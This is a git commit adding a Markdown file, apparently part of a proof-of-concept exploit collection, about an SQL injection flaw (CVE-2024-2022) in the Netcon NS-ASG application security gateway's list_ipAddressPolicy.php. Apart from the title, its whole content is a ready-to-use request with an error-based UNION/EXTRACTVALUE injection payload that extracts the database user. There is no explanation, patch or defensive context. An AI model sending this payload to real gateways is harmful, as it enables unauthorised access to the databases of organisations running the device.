Create 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md

2024-03-12 18:40:37 +08:00 · 2024-03-12 18:40:37 +08:00 · 5c3996ebe8
commit 5c3996ebe8
parent 05811c05d2
1 changed files with 7 additions and 0 deletions
--- a/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md
+++ b/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md
@ -0,0 +1,7 @@
+## 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)
+
+
+## poc
+```
+/admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e))
+```